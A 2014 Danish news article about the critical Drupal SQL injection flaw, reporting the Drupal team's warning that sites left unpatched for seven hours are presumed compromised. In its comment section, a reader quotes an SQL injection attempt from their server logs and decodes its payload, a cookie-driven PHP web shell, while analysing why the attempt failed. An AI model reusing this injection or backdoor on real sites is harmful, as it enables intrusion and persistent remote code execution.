Drupal: Som udgangspunkt er dit website hacket, hvis du ikke patchede hurtigt

31. oktober 2014 kl. 15:012
Drupal: Som udgangspunkt er dit website hacket, hvis du ikke patchede hurtigt
Illustration: Drupal.
Kritisk SQL-sårbarhed i Drupal kan have kompromitteret samtlige websites, der kører på det populære CMS og ikke blev opdateret inden for syv timer.
Artiklen er ældre end 30 dage
Manglende links i teksten kan sandsynligvis findes i bunden af artiklen.

Omfanget af hackerangreb på websites, der bruger CMS-systemet Drupal, kan være langt mere omfattende end hidtil antaget ifølge udviklerne bag systemet.

Den 15. oktober kom det frem, at en kritisk SQL-sårbarhed i Drupal gjorde muligt for hackere at få adgang til at køre forespørgsler på databaserne og få adgang til fortrolige oplysninger.

Det udnyttede en hacker blandt andet til at få adgang til en række websites under Mediehuset Ingeniøren, heriblandt Version2.dk og Ing.dk, der begge kører på Drupal.

Det har været sparsomt med udmeldinger fra andre virksomheder, der kører på systemet, men noget tyder dog på, at Mediehuset Ingeniøren ikke er den eneste Drupal-bruger, der er blevet ramt.

Artiklen fortsætter efter annoncen

Samtlige websites, der ikke patchede systemet inden for syv timer, er som udgangspunkt blevet kompromitteret - også selvom, systemet nu er blevet opdateret. Det oplyser Drupal-holdet.

Det skyldes, at hackerne kan have efterladt bagdøre i koden, som kan udnyttes selv efter opdateringen.

Især brugere, der har installeret deres Drupal-løsning gennem web-hoteller kan være i farezonen, da disse installationer normalt ikke bliver opdateret automatisk, når de først er lagt ind på serveren. Ligeledes kan virksomheder, der selv hoster Drupal-løsningen, være ramt, hvis de har ventet med at installere sikkerhedsopdateringen til efter den 16. oktober klokken et om natten, dansk tid. Kun i de få tilfælde, hvor web-hosten selv har ansvar for at opdatere applikationer som Drupal - og har gjort det i tide - kan man vide sig mere sikker.

Er det ikke tilfældet, bør man enten gå tilbage til en backup fra før den 15. oktober eller installere systemet helt forfra ifølge Drupal-holdet.

Artiklen fortsætter efter annoncen

Læs advarslen fra Drupal.

2 kommentarer.  Hop til debatten
Denne artikel er gratis...

...men det er dyrt at lave god journalistik. Derfor beder vi dig overveje at tegne abonnement på Version2.

Digitaliseringen buldrer derudaf, og it-folkene tegner fremtidens Danmark. Derfor er det vigtigere end nogensinde med et kvalificeret bud på, hvordan it bedst kan være med til at udvikle det danske samfund og erhvervsliv.

Og der har aldrig været mere akut brug for en kritisk vagthund, der råber op, når der tages forkerte it-beslutninger.

Den rolle har Version2 indtaget siden 2006 - og det bliver vi ved med.

Debatten
Log ind eller opret en bruger for at deltage i debatten.
settingsDebatindstillinger
1
31. oktober 2014 kl. 17:39

Jeg fandt et enkelt forsøg på at udnytte dette hul i mine logfiler. Vedkommende havde forsøgt at injecte flg. SQL:

INSERT INTO menu_router (path, load_functions, to_arg_functions, description, access_callback, access_arguments) VALUES ('hzvdrw', '', '', 'hzvdrw', 'file_put_contents', 0x613a323...);

Den lange hex-streng er forkertet her. Oversat til almindelig tekst ser den sådan ud:

a:2:{i:0;s:22:"modules/color/sntp.php";i:1;s:147:"<?php $form1=@$_COOKIE["Kcqf3"]; if ($form1){ $opt=$form1(@$_COOKIE["Kcqf2"]); $au=$form1(@$_COOKIE["Kcqf1"]); $opt("/292/e",$au,292); } phpinfo();";}

Resultatet er oprettelsen af en ny URL, /hzvdrw, som vedkommende forsøgte at tilgå umiddelbart efter. Dette resulterer i, at den forsøger at skrive det indlejrede PHP-kode ned i en fil i Drupal-sites webscope. PHP-koden giver mulighed for at injecte yderligere kode vha. cookies.

Forsøget mislykkedes (tror jeg), idet Apache kørte som en bruger, der ikke har adgang til at skrive ned i Drupals modulfolder.

2
2. november 2014 kl. 12:53

Det betyder nok bare at den hacker som faktisk har overtaget din server har været snu nok til at slette sine spor i logfilen.